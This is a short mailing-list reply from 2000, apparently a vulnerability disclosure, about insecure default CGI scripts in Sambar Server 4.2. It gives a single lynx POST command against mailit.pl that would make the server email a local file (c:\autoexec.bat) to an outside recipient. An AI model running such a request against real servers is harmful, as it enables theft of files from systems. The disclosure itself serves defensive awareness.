Re: Sambar Server alert! (2)

From: J.A. Gutierrez (spdat_private)
Date: Fri Feb 25 2000 - 06:11:43 PST

    	This is not the only problem with default CGI's included with
    	sambar 4.2.

    	Have you tried

    echo 'server=smtp.example.com&from=rootat_private&recipient=evilat_private&subject=Hi&body=Hello+World%0A&attach=c:\autoexec.bat' | lynx -post_data http://sambar.example.com/cgi-bin/mailit.pl

    	?

    --
    finger spdat_private for PGP       /              So be easy and free
    .mailcap tip of the day:                   /      when you're drinking with me